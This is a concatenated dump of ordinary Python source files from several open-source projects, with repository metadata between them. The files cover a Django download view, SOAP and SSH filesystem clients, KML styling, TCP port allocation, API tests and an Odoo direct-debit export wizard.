from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseBadRequest
from lib.templatetags.base_extras import set_notification
def download_view(request, file_type=None):
"""
## View for file downloads ##
- Given a file_type, return the file of that type from the scenario in the session.
filetypes = [
|
'air binary',
'air json',
'humidity binary',
'humidity json',
'land_temp binary',
'land_temp json',
'rainfall binary',
'rainfall json',
'config',
'campaign',
'demographics',
]
"""
if file_type is None:
return HttpResponseBadRequest('No file selected for
|
download.')
if 'scenario' not in request.session.keys():
return HttpResponseBadRequest('No scenario selected to download from.')
try:
my_file = request.session['scenario'].get_file_by_type(file_type)
except ObjectDoesNotExist:
set_notification('alert-error', '<strong>Error!</strong> File does not exist.', request.session)
return HttpResponseBadRequest('Scenario does not contain a file of this type.')
response = HttpResponse(mimetype='text/plain')
response['Content-Disposition'] = 'attachment; filename="%s"' % my_file.file_name
response.write(my_file.content)
return response
|
bosmanoglu/adore-doris
|
lib/ext/snaphu-v1.4.2/cython/setup.py
|
Python
|
gpl-2.0
| 550 | 0.027273 |
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
cmdclas
|
s = {'build_ext' : build_ext},
ext_modules=[Extension("_snaphu",
sources=["_snaphu.pyx",
"../src/snaphu.c",
"../src/snaphu_solver.c",
"../src/snaphu_util.c",
"../src/snaphu_cost.c",
"../src/snaphu_cs2.c",
"../src/snaphu_io.c",
"../src/snaphu_tile.c"],
include_dirs=['../src'],
extra_comp
|
ile_args=['-Wstrict-prototypes', ],
language="c")]
)
|
henrysher/opslib
|
opslib/icsutils/jsoncli.py
|
Python
|
apache-2.0
| 2,568 | 0 |
"""
JsonCli: Library for CLI based on JSON
--------------------------------------
+------------------------+-------------+
| This is the JsonCli common library. |
+------------------------+-------------+
"""
import argparse
from collections import OrderedDict
from argcomplete import autocomplete
from botocore import xform_name
type_map = {
'structure': str,
'map': str,
'timestamp': str,
'list': str,
'string': str,
'float': float,
'integer': int,
'long': int,
'boolean': bool,
'double': float,
'blob': str}
class OrderNamespace(argparse.Namespace):
"""
Namespace with Order: from argparse.Namespace
"""
__order__ = OrderedDict()
def __init__(self, **kwargs):
super(OrderNamespace, self).__init__(**kwargs)
def __setattr__(self, attr, value):
if value is not None:
self.__order__[attr] = value
super(OrderNamespace, self).__setattr__(attr, value)
def add_arguments(group, args):
"""
Add Arguments to CLI
"""
for kkk, vvv in args.iteritems():
if 'type' in vvv and vvv['type'] in type_map:
vvv['type'] = type_map[vvv['type']]
if 'help' in vvv and not vvv['help']:
vvv['help'] = argparse.SUPPRESS
changed = xform_name(kkk, "-")
if kkk != changed:
|
kkk = "-".join(["", changed])
group.add_argument(kkk, **vvv)
return group
def recursive_parser(parser, args):
"""
Recursive CLI Parser
"""
subparser = parser.add_subparsers(help=args.get(
'__help__', ''), dest=args.get('__dest__', ''))
for k, v in args.iteritems():
if k == '__help__' or k == '__dest__':
continue
group = subp
|
arser.add_parser(k, help=v.get('help', ''))
for kk, vv in v.iteritems():
if kk == 'Subparsers':
group = recursive_parser(group, vv)
elif kk == 'Arguments':
group = add_arguments(group, vv)
return parser
def parse_args(args):
"""
Create the Command Line Interface
:type args: dict
:param args: describes the command structure for the CLI
"""
parser = argparse.ArgumentParser(description=args.get('Description', ''))
for k, v in args.iteritems():
if k == 'Subparsers':
parser = recursive_parser(parser, v)
elif k == 'Arguments':
parser = add_arguments(parser, v)
autocomplete(parser)
return parser.parse_args(None, OrderNamespace())
# vim: tabstop=4 shiftwidth=4 softtabstop=4
|
grahamhayes/designate
|
designate/tests/test_api/test_v2/test_limits.py
|
Python
|
apache-2.0
| 2,306 | 0 |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from designate.tests.test_api.test_v2 import ApiV2TestCase
class ApiV2LimitsTest(ApiV2TestCase):
def test_get_limits(self):
response = self.client.get('/limits/')
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('max_zones', response.json)
self.assertIn('max_zone_records', response.json)
self.assertIn('max_zone_recordsets',
response.json)
self.assertIn('max_recordset_records',
response.json)
se
|
lf.assertIn('min_ttl', response.json)
self.assertIn('max_zone_name_length',
|
response.json)
self.assertIn('max_recordset_name_length',
response.json)
self.assertIn('max_page_limit',
response.json)
absolutelimits = response.json
self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones'])
self.assertEqual(cfg.CONF.quota_zone_records,
absolutelimits['max_zone_recordsets'])
self.assertEqual(cfg.CONF['service:central'].min_ttl,
absolutelimits['min_ttl'])
self.assertEqual(cfg.CONF['service:central'].max_zone_name_len,
absolutelimits['max_zone_name_length'])
self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len,
absolutelimits['max_recordset_name_length'])
self.assertEqual(cfg.CONF['service:api'].max_limit_v2,
absolutelimits['max_page_limit'])
|
numberoverzero/bottom
|
tests/integ/test_local.py
|
Python
|
mit
| 546 | 0 |
def test_connect(client, connect):
"""Con
|
nect client triggers client_connect"""
connect()
assert client.triggers['CLIENT_CONNECT'] == 1
def test_ping_pong(client, server, connect, flush):
connect()
server.write("PING
|
:ping-message")
client.send("PONG")
# Protocol doesn't advance until loop flushes
assert not client.triggers["PING"]
assert not server.received
flush()
flush()
# Both should have been received now
assert client.triggers["PING"] == 1
assert server.received == ["PONG"]
|
althonos/fs.sshfs
|
fs/opener/sshfs.py
|
Python
|
lgpl-2.1
| 1,998 | 0.002002 |
# coding: utf-8
from __future__ import unicode_literals
from __future__ import absolute_import
import configparser
import six
from .base import Opener
from .registry import registry
from ..subfs import ClosingSubFS
from ..errors import FSError, CreateFailed
__license__ = "LGPLv2+"
__copyright__ = "Copyright (c) 2017-2021 Martin Larralde"
__author__ = "Martin Larralde <martin.larralde@embl.de>"
__version__ = __version__ = (
__import__("pkg_resources")
.resource_string("fs.sshfs", "_version.txt")
.strip()
.decode("ascii")
)
class SSHOpener(Opener):
protocols = ['ssh']
@staticmethod
def open_fs(fs_url, parse_result, writeable, create, cwd):
from ..sshfs import SSHFS
|
ssh_host, _, dir_path = parse_result.resource.partition('/')
ssh_host, _, ssh_port = ssh_host.partition(':')
ssh_port = int(ssh_port) if ssh_port.isdigit() else 22
|
params = configparser.ConfigParser()
params.read_dict({'sshfs':getattr(parse_result, 'params', {})})
ssh_fs = SSHFS(
ssh_host,
user=parse_result.username,
passwd=parse_result.password,
pkey=params.get('sshfs', 'pkey', fallback=None),
timeout=params.getint('sshfs', 'timeout', fallback=10),
port=ssh_port,
keepalive=params.getint('sshfs', 'keepalive', fallback=10),
compress=params.getboolean('sshfs', 'compress', fallback=False),
config_path=\
params.get('sshfs', 'config_path', fallback='~/.ssh/config'),
exec_timeout=params.getint('sshfs', 'timeout', fallback=None),
)
try:
if dir_path:
if create:
ssh_fs.makedirs(dir_path, recreate=True)
return ssh_fs.opendir(dir_path, factory=ClosingSubFS)
else:
return ssh_fs
except Exception as err:
six.raise_from(CreateFailed, err)
registry.install(SSHOpener)
|
EdFarrell/MilkMachine
|
src/MilkMachine/simplekml/styleselector.py
|
Python
|
gpl-3.0
| 6,912 | 0.002315 |
"""
Copyright 2011-2014-2012 Kyle Lancaster
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Contact me at kyle.lan@gmail.com
"""
from simplekml.base import Kmlable, check
from simplekml.substyle import IconStyle, LabelStyle, LineStyle, PolyStyle, BalloonStyle, ListStyle
class StyleSelector(Kmlable):
"""Abstract style class, extended by :class:`simplekml.Style` and :class:`simplekml.StyleMap`
There are no arguments.
"""
_id = 0
def __init__(self):
super(StyleSelector, self).__init__()
self._id = "stylesel_{0}".format(StyleSelector._id)
StyleSelector._id += 1
@property
def id(self):
"""The id of the style, read-only."""
return self._id
class Style(StyleSelector):
"""Styles affect how Geometry is presented.
Arguments are the same as the properties.
Usage::
import simplekml
kml = simplekml.Kml()
pnt = kml.newpoint(name='A Point')
pnt.coords = [(1.0, 2.0)]
pnt.style.labelstyle.color = simplekml.Color.red # Make the text red
pnt.style.labelstyle.scale = 2 # Make the text twice as big
pnt.style.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png'
kml.save("Style.kml")
"""
def __init__(self,
iconstyle=None,
labelstyle=None,
linestyle=None,
polystyle=None,
balloonstyle=None,
liststyle=None):
super(Style, self).__init__()
self._kml["IconStyle_"] = iconstyle
self._kml["LabelStyle_"] = labelstyle
self._kml["LineStyle_"] = linestyle
self._kml["PolyStyle_"] = polystyle
self._kml["BalloonStyle"] = balloonstyle
self._kml["ListStyle"] = liststyle
def __str__(self):
return '<Style id="{0}">{1}</Style>'.format(self._id, super(Style, self).__str__())
@property
def iconstyle(self):
"""The iconstyle, accepts :class:`simplekml.IconStyle`."""
if self._kml["IconStyle_"] is None:
self._kml["IconStyle_"] = IconStyle()
return self._kml["IconStyle_"]
@iconstyle.setter
@check(IconStyle)
def iconstyle(self, iconstyle):
self._kml["IconStyle_"] = iconstyle
@property
def labelstyle(self):
"""The labelstyle, accepts :class:`simplekml.LabelStyle`."""
if self._kml["LabelStyle_"] is None:
self._kml["LabelStyle_"] = LabelStyle()
return self._kml["LabelStyle_"]
@labelstyle.setter
@check(LabelStyle)
def labelstyle(self, labelstyle):
self._kml["LabelStyle_"] = labelstyle
@property
def linestyle(self):
"""The linestyle, accepts :class:`simplekml.LineStyle`."""
if self._kml["LineStyle_"] is None:
self._kml["LineStyle_"] = LineStyle()
return self._kml["LineStyle_"]
@linestyle.setter
@check(LineStyle)
def linestyle(self, linestyle):
self._kml["LineStyle_"] = linestyle
@property
def polystyle(self):
"""The polystyle, accepts :class:`simplekml.PolyStyle`."""
if self._kml["PolyStyle_"] is None:
self._kml["PolyStyle_"] = PolyStyle()
return self._kml["PolyStyle_"]
@polystyle.setter
@check(PolyStyle)
def polystyle(self, polystyle):
self._kml["PolyStyle_"] = polystyle
@property
def balloonstyle(self):
"""The balloonstyle, accepts :class:`simplekml.BalloonStyle`."""
if self._kml["BalloonStyle"] is None:
self._kml["BalloonStyle"] = BalloonStyle()
return self._kml["BalloonStyle"]
@balloonstyle.setter
@check(BalloonStyle)
def balloonstyle(self, balloonstyle):
self._kml["BalloonStyle"] = balloonstyle
@property
def liststyle(self):
"""The liststyle, accepts :class:`simplekml.ListStyle`."""
if self._kml["ListStyle"] is None:
self._kml["ListStyle"] = ListStyle()
return self._kml["ListStyle"]
@liststyle.setter
@check(ListStyle)
def liststyle(self, liststyle):
self._kml["ListStyle"] = liststyle
class StyleMap(StyleSelector):
"""Styles affect how Geometry is presented.
Arguments are the same as the properties.
Usage::
import simplekml
kml = simplekml.Kml()
pnt = kml.newpoint(coords=[(18.432314,-33.988862)])
pnt.stylemap.normalstyle.labelstyle.color = simplekml.Color.blue
pnt.stylemap.highlightstyle.labelstyle.color = simplekml.Color.red
kml.save("StyleMap.kml")
"""
def __init__(self,
normalstyle=None,
highlightstyle=None):
super(StyleMap, self).__init__()
self._pairnormal = None
self._pairhighlight = None
self.normalstyle = normalstyle
self.highlightstyle = highlightstyle
def __str__(self):
buf = ['<StyleMap id="{0}">'.format(self._id),
super(StyleMap, self).__str__()]
if self._pairnormal is not None:
buf.append("<Pair>")
buf.append("<key>normal</key>")
buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairnormal._id))
buf.append("</Pair>")
if self._pairhighlight is not None:
buf.append("<Pair>")
buf.append("<key>highlight</key>")
buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairhighlight._id))
buf.append("</Pair>")
buf.append("</StyleMap>")
return "".join(buf)
@property
def normalstyle(self):
"""The normal :class:`simplekml.Style`, accepts :class:`simplekml.Style`."""
if self._pairnormal is None:
self._pairnormal = Style()
return self._pairnormal
@normalstyle.setter
@check(Style)
|
def normalstyle(self, normal):
|
self._pairnormal = normal
@property
def highlightstyle(self):
"""The highlighted :class:`simplekml.Style`, accepts :class:`simplekml.Style`."""
if self._pairhighlight is None:
self._pairhighlight = Style()
return self._pairhighlight
@highlightstyle.setter
@check(Style)
def highlightstyle(self, highlighturl):
self._pairhighlight = highlighturl
|
xolox/python-executor
|
executor/tcp.py
|
Python
|
mit
| 6,803 | 0.003675 |
# Programmer friendly subprocess wrapper.
#
# Author: Peter Odding <peter@peterodding.com>
# Last Change: March 2, 2020
# URL: https://executor.readthedocs.io
"""
Miscellaneous TCP networking functionality.
The functionality in this module originated in the :class:`executor.ssh.server`
module with the purpose of facilitating a robust automated test suite for the
:class:`executor.ssh.client` module. While working on SSH tunnel support I
needed similar logic again and I decided to extract this code from the
:class:`executor.ssh.server` module.
"""
# Standard library modules.
import itertools
import logging
import random
import socket
# Modules included in our package.
from executor import ExternalCommand
# External dependencies.
from humanfriendly import Timer, format_timespan
from humanfriendly.terminal.spinners import Spinner
from humanfriendly.text import format, pluralize
from property_manager import (
PropertyManager,
lazy_property,
mutable_property,
required_property,
set_property,
)
# Public identifiers that require documentation.
__all__ = (
'EphemeralPortAllocator',
'EphemeralTCPServer',
'TimeoutError',
'WaitUntilConnected',
'logger',
)
# Initialize a logger.
logger = logging.getLogger(__name__)
class WaitUntilConnected(PropertyManager):
"""Wait for a TCP endpoint to start accepting connections."""
@mutable_property
def connect_timeout(self):
"""The timeout in seconds for individual connection attempts (a number, defaults to 2)."""
return 2
@property
def endpoint(self):
"""A human friendly representation of the TCP endpoint (a string containing a URL)."""
return format("%s://%s:%i", self.scheme, self.hostname, self.port_number)
@mutable_property
def hostname(self):
"""The host name or IP address to connect to (a string, defaults to ``localhost``)."""
return 'localhost'
@property
def is_connected(self):
""":data:`True` if a connection was accepted, :data:`False` otherwise."""
timer = Timer()
logger.debug("Checking whether %s is accepting connections ..", self.endpoint)
try:
socket.create_connection((self.hostname, self.port_number), self.connect_timeout)
logger.debug("Yes %s is accepting connections (t
|
ook %s).", self.endpoint, timer)
return True
except Exception:
logger.debug("No %s isn't accepting connections (took %s).", self.endpoint, timer)
return False
@required_property
def port_number(self):
"""The port number to connect to (an integer)."""
@mutable_property
def
|
scheme(self):
"""A URL scheme that indicates the purpose of the ephemeral port (a string, defaults to 'tcp')."""
return 'tcp'
@mutable_property
def wait_timeout(self):
"""The timeout in seconds for :func:`wait_until_connected()` (a number, defaults to 30)."""
return 30
def wait_until_connected(self):
"""
Wait until connections are being accepted.
:raises: :exc:`TimeoutError` when the SSH server isn't fast enough to
initialize.
"""
timer = Timer()
with Spinner(timer=timer) as spinner:
while not self.is_connected:
if timer.elapsed_time > self.wait_timeout:
raise TimeoutError(format(
"Failed to establish connection to %s within configured timeout of %s!",
self.endpoint, format_timespan(self.wait_timeout),
))
spinner.step(label="Waiting for %s to accept connections" % self.endpoint)
spinner.sleep()
logger.debug("Waited %s for %s to accept connections.", timer, self.endpoint)
class EphemeralPortAllocator(WaitUntilConnected):
"""
Allocate a free `ephemeral port number`_.
.. _ephemeral port number: \
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports
"""
@lazy_property
def port_number(self):
"""A dynamically selected free ephemeral port number (an integer between 49152 and 65535)."""
timer = Timer()
logger.debug("Looking for free ephemeral port number ..")
for i in itertools.count(1):
value = self.ephemeral_port_number
set_property(self, 'port_number', value)
if not self.is_connected:
logger.debug("Found free ephemeral port number %s after %s (took %s).",
value, pluralize(i, "attempt"), timer)
return value
@property
def ephemeral_port_number(self):
"""A random ephemeral port number (an integer between 49152 and 65535)."""
return random.randint(49152, 65535)
class EphemeralTCPServer(ExternalCommand, EphemeralPortAllocator):
"""
Make it easy to launch ephemeral TCP servers.
The :class:`EphemeralTCPServer` class makes it easy to allocate an
`ephemeral port number`_ that is not (yet) in use.
.. _ephemeral port number: \
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports
"""
@property
def asynchronous(self):
"""Ephemeral TCP servers always set :attr:`.ExternalCommand.asynchronous` to :data:`True`."""
return True
def start(self, **options):
"""
Start the TCP server and wait for it to start accepting connections.
:param options: Any keyword arguments are passed to the
:func:`~executor.ExternalCommand.start()` method of the
superclass.
:raises: Any exceptions raised by :func:`~executor.ExternalCommand.start()`
and :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`.
If the TCP server doesn't start accepting connections within the
configured timeout (see :attr:`~executor.tcp.WaitUntilConnected.wait_timeout`)
the process will be terminated and the timeout exception is propagated.
"""
if not self.was_started:
logger.debug("Preparing to start %s server ..", self.scheme.upper())
super(EphemeralTCPServer, self).start(**options)
try:
self.wait_until_connected()
except TimeoutError:
self.terminate()
raise
class TimeoutError(Exception):
"""
Raised when a TCP server doesn't start accepting connections quickly enough.
This exception is raised by :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`
when the TCP server doesn't start accepting connections within a reasonable time.
"""
|
amanharitsh123/zulip
|
zerver/management/commands/rename_stream.py
|
Python
|
apache-2.0
| 1,181 | 0.000847 |
from typing import Any
from argparse import ArgumentParser
from zerver.lib.actions import do_rename_stream
from zerver.lib.str_utils import force_text
from zerver.lib.management import ZulipBaseCommand
from zerver.models import get_stream
import sys
class Command(ZulipBaseCommand):
help = """Change the stream name for a realm."""
def add_arguments(self, parser):
# type: (ArgumentParser) -> None
parser.add_argument('old_name', metavar='<old name>', type=str,
help='name of stream to be renamed')
parser.add_argument('new_name', metavar='<new
|
na
|
me>', type=str,
help='new name to rename the stream to')
self.add_realm_args(parser, True)
def handle(self, *args, **options):
# type: (*Any, **str) -> None
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
old_name = options['old_name']
new_name = options['new_name']
encoding = sys.getfilesystemencoding()
stream = get_stream(force_text(old_name, encoding), realm)
do_rename_stream(stream, force_text(new_name, encoding))
|
prezi/prezi-suds
|
suds/client.py
|
Python
|
lgpl-3.0
| 28,017 | 0.002498 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
The I{2nd generation} service proxy provides access to web services.
See I{README.txt}
"""
import suds
import suds.metrics as metrics
from cookielib import CookieJar
from suds import *
from suds.reader import DefinitionsReader
from suds.transport import TransportError, Request
from suds.transport.https import HttpAuthenticated
from suds.servicedefinition import ServiceDefinition
from suds import sudsobject
from sudsobject import Factory as InstFactory
from sudsobject import Object
from suds.resolver import PathResolver
from suds.builder import Builder
from suds.wsdl import Definitions
from suds.cache import ObjectCache
from suds.sax.document import Document
from suds.sax.parser import Parser
from suds.options import Options
from suds.properties import Unskin
from urlparse import urlparse
from copy import deepcopy
from suds.plugin import PluginContainer
from logging import getLogger
log = getLogger(__name__)
class Client(object):
"""
A lightweight web services client.
I{(2nd generation)} API.
@ivar wsdl: The WSDL object.
@type wsdl:L{Definitions}
@ivar service: The service proxy used to invoke operations.
@type service: L{Service}
@ivar factory: The factory used to create objects.
@type factory: L{Factory}
@ivar sd: The service definition
@type sd: L{ServiceDefinition}
@ivar messages: The last sent/received messages.
@type messages: str[2]
"""
@classmethod
def items(cls, sobject):
"""
Extract the I{items} from a suds object much like the
items() method works on I{dict}.
@param sobject: A suds object
@type sobject: L{Object}
@return: A list of items contained in I{sobject}.
@rtype: [(key, value),...]
"""
return sudsobject.items(sobject)
@classmethod
def dict(cls, sobject):
"""
Convert a sudsobject into a dictionary.
@param sobject: A suds object
@type sobject: L{Object}
@return: A python dictionary containing the
items contained in I{sobject}.
@rtype: dict
"""
return sudsobject.asdict(sobject)
@classmethod
def metadata(cls, sobject):
"""
Extract the metadata from a suds object.
@param sobject: A suds object
@type sobject: L{Object}
@return: The object's metadata
@rtype: L{sudsobject.Metadata}
"""
return sobject.__metadata__
def __init__(self, url, **kwargs):
"""
@param url: The URL for the WSDL.
@type url: str
@param kwargs: keyword arguments.
@see: L{Options}
"""
options = Options()
options.transport = HttpAuthenticated()
self.options = options
options.cache = ObjectCache(days=1)
self.set_options(**kwargs)
reader = DefinitionsReader(options, Definitions)
self.wsdl = reader.open(url)
plugins = PluginContainer(options.plugins)
plugins.init.initialized(wsdl=self.wsdl)
self.factory = Factory(self.wsdl)
self.service = ServiceSelector(self, self.wsdl.services)
self.sd = []
for s in self.wsdl.services:
sd = ServiceDefinition(self.wsdl, s)
self.sd.append(sd)
self.messages = dict(tx=None, rx=None)
def set_options(self, **kwargs):
"""
Set options.
@param kwargs: keyword arguments.
@see: L{Options}
"""
p = Unskin(self.options)
p.update(kwargs)
def add_prefix(self, prefix, uri):
"""
Add I{static} mapping of an XML namespace prefix to a namespace.
This is useful for cases when a wsdl and referenced schemas make heavy
use of namespaces and those namespaces are subject to changed.
@param prefix: An XML namespace prefix.
@type prefix: str
@param uri: An XML namespace URI.
@type uri: str
@raise Exception: when prefix is already mapped.
"""
root = self.wsdl.root
mapped = root.resolvePrefix(prefix, None)
if mapped is None:
root.addPrefix(prefix, uri)
return
if mapped[1] != uri:
raise Exception('"%s" already mapped as "%s"' % (prefix, mapped))
def last_sent(self):
"""
Get last sent I{soap} message.
@return: The last sent I{soap} message.
@rtype: L{Document}
"""
return self.messages.get('tx')
def last_received(self):
"""
Get last received I{soap} message.
@return: The last received I{soap} message.
@rtype: L{Document}
"""
return self.messages.get('rx')
def clone(self):
"""
Get a shallow clone of this object.
The clone only shares the WSDL. All other attributes are
unique to the cloned object including options.
@return: A shallow clone.
@rtype: L{Client}
"""
class Uninitialized(Client):
def __init__(self):
pass
clone = Uninitialized()
clone.options = Options()
cp = Unskin(clone.options)
mp = Unskin(self.options)
cp.update(deepcopy(mp))
clone.wsdl = self.wsdl
clone.factory = self.factory
clone.service = ServiceSelector(clone, self.wsdl.services)
clone.sd = self.sd
clone.messages = dict(tx=None, rx=None)
return clone
def __str__(self):
return unicode(self)
def __unicode__(self):
s = ['\n']
build = suds.__build__.split()
|
s.append('Suds ( https://fedorahosted.org/suds/ )')
s.append(' version: %s' % suds.__version__)
s.append(' %s build: %s' % (build[0], build[1]))
for sd in self.sd:
s.append('\n\n%s' % unicode(sd)
|
)
return ''.join(s)
class Factory:
"""
A factory for instantiating types defined in the wsdl
@ivar resolver: A schema type resolver.
@type resolver: L{PathResolver}
@ivar builder: A schema object builder.
@type builder: L{Builder}
"""
def __init__(self, wsdl):
"""
@param wsdl: A schema object.
@type wsdl: L{wsdl.Definitions}
"""
self.wsdl = wsdl
self.resolver = PathResolver(wsdl)
self.builder = Builder(self.resolver)
def create(self, name):
"""
create a WSDL type by name
@param name: The name of a type defined in the WSDL.
@type name: str
@return: The requested object.
@rtype: L{Object}
"""
timer = metrics.Timer()
timer.start()
type = self.resolver.find(name)
if type is None:
raise TypeNotFound(name)
if type.enum():
result = InstFactory.object(name)
for e, a in type.children():
setattr(result, e.name, e.name)
else:
try:
result = self.builder.build(type)
except Exception, e:
log.error("create '%s' failed", name, exc_info=True)
raise BuildError(name, e)
timer.stop()
metrics.log.debug('%s created: %s', name, timer)
return result
def separator(self, ps):
|
ndtran/l10n-switzerland
|
l10n_ch_lsv_dd/wizard/lsv_export_wizard.py
|
Python
|
agpl-3.0
| 21,814 | 0 |
##############################################################################
#
# Swiss localization Direct Debit module for OpenERP
# Copyright (C) 2014 Compassion (http://www.compassion.ch)
# @author: Cyril Sester <cyril.sester@outlook.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import collections
from openerp import models, fields, api, _, netsvc, exceptions
from datetime import date, datetime, timedelta
from openerp.tools import mod10r, DEFAULT_SERVER_DATE_FORMAT
import logging
logger = logging.getLogger(__name__)
class lsv_export_wizard(models.TransientModel):
''' LSV file generation wizard. This wizard is called
when the "make payment" button on a direct debit order
with payment type "LSV" is pressed
'''
_name = 'lsv.export.wizard'
_description = 'Export LSV Direct Debit File'
treatment_type = fields.Selection(
[('P', _('Production')), ('T', _('Test'))],
_('Treatment type'),
required=True,
default='T' # FIXME for release
)
currency = fields.Selection(
[('CHF', 'CHF'), ('EUR', 'EUR')],
_('Currency'),
required=True,
default='CHF'
)
banking_export_ch_dd_id = fields.Many2one(
'banking.export.ch.dd',
_('LSV file'),
readonly=True
)
file = fields.Binary(
string=_('File'),
related='banking_export_ch_dd_id.file'
)
filename = fields.Char(
string=_('Filename'),
related='banking_export_ch_dd_id.filename',
size=256,
readonly=True
)
nb_transactions = fields.Integer(
string=_('Number of Transactions'),
related='banking_export_ch_dd_id.nb_transactions'
)
total_amount = fields.Float(
string=_('Total Amount'),
related='banking_export_ch_dd_id.total_amount'
)
state = fields.Selection(
[('create', _('Create')), ('finish', _('Finish'))],
_('State'),
readonly=True,
default='create'
)
@api.multi
def generate_lsv_file(self):
''' Generate direct debit export object including the lsv file
content. Called by generate button.
'''
self.ensure_one()
payment_order_obj = self.env['payment.order']
payment_line_obj = self.env['payment.line']
active_ids = self.env.context.get('active_ids', [])
if not active_ids:
raise exceptions.ValidationError(_('No payment order selected'))
payment_order_ids = payment_order_obj.browse(active_ids)
# common properties for all lines
properties = self._setup_properties(payment_order_ids[0])
total_amount = 0.0
lsv_lines = []
for payment_order in payment_order_ids:
total_amount = total_amount + payment_order.total
ben_bank_id = payment_order.mode.bank_id
clean_acc_number = ben_bank_id.acc_number.replace(' ', '')
clean_acc_number = clean_acc_number.replace('-', '')
ben_address = self._get_account_address(ben_bank_id)
properties.update({
'ben_address': ben_address,
'ben_iban': clean_acc_number,
'ben_clearing': self._get_clearing(payment_order.mode.bank_id),
})
if not self._is_ch_li_iban(properties.get('ben_iban')):
raise exceptions.ValidationError(
_('Ben IBAN is not a correct CH or LI IBAN (%s given)') %
properties.get('ben_iban')
)
order_by = ''
if payment_order.date_prefered == 'due':
order_by = 'account_move_line.date_maturity ASC, '
order_by += 'payment_line.bank_id'
# A direct db query is used because order parameter in model.search
# doesn't support function fields
self.env.cr.execute(
'SELECT payment_line.id FROM payment_line, account_move_line '
'WHERE payment_line.move_line_id = account_move_line.id '
'AND payment_line.order_id = %s '
'ORDER BY ' + order_by, (payment_order.id,))
sorted_line_ids = [row[0] for row in self.env.cr.fetchall()]
payment_lines = payment_line_obj.browse(sorted_line_ids)
for line in payment_lines:
if not line.mandate_id or not line.mandate_id.state == "valid":
raise exceptions.ValidationError(
_('Line with ref %s has no associated valid mandate') %
line.name
)
# Payment line is associated to generated line to make
# customizing easier.
lsv_lines.append((line, self._generate_debit_line(
line, properties, payment_order)))
properties.update({'seq_nb': properties['seq_nb'] + 1})
lsv_lines.append((None, self._generate_total_line(properties,
total_amount)))
lsv_lines = self._customize_lines(lsv_lines, properties)
file_content = ''.join(lsv_lines) # Concatenate all lines
file_content = ''.join(
[ch if ord(ch) < 128 else '?' for ch in file_content])
export_id = self._create_lsv_export(active_ids,
total_amount,
properties,
file_content)
self.write({'banking_export_ch_dd_id': export_id.id,
'state': 'finish'})
action = {
'name': 'Generated File',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': self._name,
'res_id': self.id,
'target': 'new',
}
return action
@api.model
def _generate_debit_line(self, line, properties, payment_order):
''' Convert each payment_line to lsv debit line '''
deb_acc_number = line.bank_id.acc_number
deb_acc_number = deb_acc_number.replace(' ', '').replace('-', '')
if line.bank_id.state == 'iban' and not self._is_ch_li_iban(
deb_acc_number):
raise exceptions.ValidationError(
_('Line with ref %s has not a correct CH or LI IBAN'
'(%s given)') % (line.name, deb_acc_number)
)
vals = collections.OrderedDict()
vals['TA'] = '875'
vals['VNR'] = '0'
vals['VART'] = properties.get('treatment_type', 'P')
vals['GVDAT'] = self._prepare_date(
self._get_treatment_date(payment_order.date_prefered,
|
line.ml_maturity_date,
payment_order.date_scheduled,
line.name))
vals['BCZP'] = self._complete_line(
self._get_clearing(line.bank_id), 5)
vals['EDAT'] = properties.get('edat')
vals['BCZE'] = self._complete_line(p
|
roperties.get('ben_clearing'), 5)
vals['ABSID'] = properties.get('lsv_identifier')
vals['ESE
|
Elastica/kombu
|
kombu/tests/utils/test_utils.py
|
Python
|
bsd-3-clause
| 10,301 | 0 |
from __future__ import absolute_import, unicode_literals
import pickle
from io import StringIO, BytesIO
from kombu import version_info_t
from kombu import utils
